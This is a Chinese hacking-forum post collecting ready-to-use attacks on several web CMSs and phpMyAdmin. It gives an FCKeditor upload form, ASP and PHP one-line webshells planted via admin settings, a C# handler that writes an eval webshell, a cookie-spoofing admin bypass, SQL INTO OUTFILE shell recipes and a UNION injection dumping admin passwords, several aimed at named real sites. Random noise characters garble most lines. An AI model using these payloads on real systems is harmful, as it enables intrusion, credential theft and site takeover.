如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件5 A$ g" R8 `& s
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
1 L: M3 q% u0 b/ u9 ]7 oUpload a new file:<br>
$ l2 \ c1 S y9 G. c<input type="file" name="NewFile" size="50"><br>
6 b9 o( \5 w+ t<input id="btnUpload" type="submit" value="Upload">
) e" ?0 r/ M: h) r! l</form>
2 }3 _4 ], v7 A- s+ X6 i-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 A) a; D3 {8 t7 x
! p& T% K- }; C, u1 B0 l; Z
SDcms 后台拿webshell
4 z+ r2 z0 J- o( |, z2 y$ s0 M H8 _& f8 V
第一种方法:( u6 }. Q7 g) W8 s3 P" B
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
3 w' V0 r! x8 B- I$ Z把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx) h! j" m* ]* J( [$ L0 K% Z
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。. h7 E3 C" v8 t* d# k( M o0 @
第二种方法:
4 X9 l5 e3 H) y进入后台-->系统管理-->系统设置-->系统设置->上传设置;
3 q7 W$ l' L0 r* F在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
' Z6 [/ r3 y0 {, W3 `8 Q第三种方法:) u w( @8 @, Q" a8 _& k! t
进入后台-->界面管理-->模板文件管理-->创建文件
! Z: W! ~" C4 I: e文件名写入getshell.ashx
) X( G2 M& r7 ^% p内容写入下面内容:/ ?# z9 b- }. i+ K, ]' l
/====================复制下面的=========================/6 n7 q1 U9 j1 x6 e$ G( p7 i
<%@ WebHandler Language="C#" Class="Handler" %>
# R- {$ S! _8 Y2 ~using System;
* \( f2 A# a; ^, g% r+ E+ Yusing System.Web; y$ L, P) p+ v2 |+ f
using System.IO;3 ^$ D. Y. R0 d3 q+ ^& m" L$ v
public class Handler : IHttpHandler {1 A- J( l9 s0 ?$ R$ a- V
public void ProcessRequest (HttpContext context) {
/ T. B# Q# u7 N& `context.Response.ContentType = "text/plain";
- I I; m. \ m O. EStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
, [( x' w+ H. r1 I$ |file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
7 j1 c5 n! I; O0 _* C+ E8 J' G( xfile1.Flush();
i) g/ f$ O; j9 o; s: _* Ffile1.Close();8 z: Y! `! W- w' P% q! g: Y$ B
}8 f* Q, D# b9 g1 ^
public bool IsReusable {3 E: M9 Y7 S( O
get {
6 `0 r* Z- W* ~2 j7 D% N0 {return false;) N+ J! H0 {2 f8 u( k2 m
}
& X+ N7 ]4 Y8 v* T}
% D# c7 V* Q: B9 ]0 W7 `, T- `}
7 r$ |/ K7 H0 }, F/=============================================/
6 a- i+ j- A; h" G, v3 S% s访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx2 N H5 ?# b( @6 j5 q/ E4 P
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
) _8 E; T q+ y- P& \3 g7 J+ @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 H8 T- ?0 T- f& X. J4 x4 M; g( C
7 X: V; m, d- R6 @" W$ D; b
ESCMS网站管理系统0day# U- R o! g# u" c, L8 p
3 o) t: c/ o4 e4 t, {$ P, A& b后台登陆验证是通过admin/check.asp实现的
6 o3 I: H! R- X f' @
6 D* n' P% C) P Y' N首先我们打开http://target.com/admin/es_index.html
5 \3 k C' w8 \: V5 p然后在COOKIE结尾加上
1 g8 { o a$ a% [6 ^+ I; ESCMS$_SP2=ES_admin=st0p;
* g- |/ i; C) a) w* ~6 [8 T修改,然后刷新
; j( o6 M+ S9 v8 ^& }' Q" [0 a进后台了嘎..% k$ N' y2 b( D8 k
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
# Y* E& Y% _7 ~. l4 E6 D5 ]& r0 \0 y# |/ i- s
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.- G, S4 l- y O3 |8 g! p
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp- a! w; t1 l O2 U
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
" l1 o8 `5 R: u2 J5 ~在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
4 @/ e# j) ^( K/ H3 X8 b------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 T- z& g2 L/ x% I: r
( H( i+ c6 i+ |' C6 |" ?! S宁志网站管理系统后台无验证漏洞及修复9 e! o* A, G/ R( G+ ~) {
5 I% H, k3 H& M: C) i网上搜了一下,好像没有发布.如有雷同纯粹巧合!; z! P, T% M2 G2 M# {4 X' E
官方网站:www.ningzhi.net0 T/ z2 _- ?2 n2 G& d" t+ H6 t
学校网站管理系统 V.2011版本 2 J( t" h$ R0 v* w& u" m3 Q
http://down.chinaz.com/soft/29943.htm
* y. P8 z9 t9 L# J/ [7 T其它版本(如:政府版等),自行下载.
0 C$ C5 V+ s$ Y; ^. r b漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
) d7 w2 C2 j6 e" q. Z Flogin.asp代码如下:+ _% U K& {5 k5 V7 n2 ^# p0 k6 v
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> / l. p) t! _2 x7 h
manage.asp代码我就不帖出来了.反正也没验证.
- V! |0 }$ v/ I* o4 N只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!6 a$ @6 m, ^$ P* P; n* a& p3 O
漏洞利用:6 I7 d, H: [- C( d! P+ e7 k; w
直接访问http://www.0855.tv/admin/manage.asp, c' T; a& ]6 g
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5* j+ A7 t2 b; [9 k9 P+ \: E
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' t3 A+ [ l4 u! D& O2 s8 F3 b& G. A" v' A/ l+ l1 r
phpmyadmin拿shell的四种方法总结及修复% W4 i3 L/ K/ P y- _- v, S
) q2 t+ D8 m# @) @* ^. Y
方法一:
* f$ U' _8 p# B" N/ ICREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
; `( W, C: s' }* CINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');$ [, w$ k+ s+ E2 j( k- o+ p% q$ U
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
' ]: @$ k# d* E$ m4 G% a( `----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php+ d8 ?& }/ z3 G
一句话连接密码:7on$ ]. `" ]$ I6 [* t' i7 J( ~1 b6 y& \
方法二:
6 ^0 u4 Q) e: f- E" D, N+ }- I& X读取文件内容: select load_file('E:/xamp/www/s.php');
( a; c- T( W4 w% e写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
! r+ q: c% Z; L& H1 _cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
. i' L0 H% y5 A方法三:
# H3 R; B( V5 j$ Q% [2 DJhackJ版本 PHPmyadmin拿shell7 U) x9 M* j) S/ W" S. @+ T
Create TABLE study (cmd text NOT NULL);) [9 P. _/ l6 E- N( `, m, \5 K
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
6 h6 r2 e! N6 b. U5 }select cmd from study into outfile 'E:/wamp/www/7.php';
: W0 p" q1 U- F e1 V8 z0 I2 {6 Z$ ODrop TABLE IF EXISTS study; l% \- X% }! q! ?* n6 o1 l
<?php eval($_POST[cmd])?>
, C: \0 m Z0 kCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。9 F; E% [& p: v# C# D5 k( I
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 10 [$ y C* J- d% j% p k4 Q' b& B
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 15 p6 w5 O6 O& n7 V) h0 m
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
9 M- O# P8 p$ Q/ b& K方法四:; U; N' p8 i9 \
select load_file('E:/xamp/www/study.php');
5 V/ y/ u1 o& H* Y. A( d3 _7 lselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
) Z: P3 R2 c! N0 Q1 R! `# H, e然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
: M) _: X1 f7 | Z* e `9 H-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
; m# k8 p8 L' _4 C7 M# D1 i2 s0 t! S: V/ F
NO.001中学网站管理系统 Build 110628 注入漏洞
9 D% `9 [+ ^" S; y2 Z
$ y1 [9 U/ N' b' v9 W: UNO.001中学网站管理系统功能模块:
: B+ i, U8 k; k1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
. h+ c# u! g( R2 p& ~5 U8 q2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息" t; A' ]5 E2 y4 {
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
8 o6 N$ Q% N- p/ }' D4.视频图片管理:一级分类,动态添加视频或者图片等信息
# {" b. y& [1 l0 H5.留言管理:对留言,修改,删除、回复等管理" A+ `3 b$ t& t; G6 x, L% F
6.校友频道:包括校友资料excel导出、管理等功能
( Q* p% K q) F. b# o8 h7 \: F7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
H" R" g, c- c e: [% J默认后台:admin/login.asp0 Z0 T; Y! B' @& O0 a- j
官方演示:http://demo.001cms.net: j% X/ J4 E, @# T
源码下载地址:http://down.chinaz.com/soft/30187.htm
8 e7 E/ F, _- p' `; d$ yEXP:* K& G! F& m* T6 k9 }9 r5 @% V
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin8 D+ C0 l# D M6 ^
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
7 s$ |/ u- _( Z6 wgetshell:后台有备份,你懂的
. v7 }* V2 |% F0 x另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
2 y9 N% u* T; p; l) \' E------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对